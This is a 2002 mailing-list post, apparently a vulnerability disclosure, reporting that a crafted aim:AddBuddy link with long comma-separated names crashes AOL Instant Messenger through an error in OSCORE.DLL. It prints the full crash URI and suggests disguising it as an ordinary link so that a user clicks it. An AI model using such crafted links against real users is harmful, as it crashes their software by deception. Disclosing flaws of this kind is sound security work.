From: InterWN Labs (interwninterwn.nl)
Date: Wed May 08 2002 - 18:01:26 CDT

    Hello all,

    This morning I noticed something while playing
    around with the aim:AddBuddy hyperlink for AIM.
    If you add many characters separated by commas
    you can crash the aim when a user clicks it.

    An example:

    aim:AddBuddy?
    ScreenName=InterWN,InterWN,InterWN,InterWN,InterWN,InterWN,I
    nterWN,InterWN,InterWN,InterWN,InterWN,InterWN&groupname=Int
    erWN,InterWN,InterWN,InterWN,InterWN,InterWN,InterWN,InterWN
    ,InterWN,InterWN,InterWN,InterWN

    It causes an error in OSCORE.DLL and which
    then causes Instant Messenger to crash. If
    anyone is willing to work with me do a
    little further research on the problem just let
    me know.

    Obviously no one would click that link about,
    but you can hide it with the make a link option
    aim has in the window.

    Thanx a lot.

    philer
    www.interwn.nl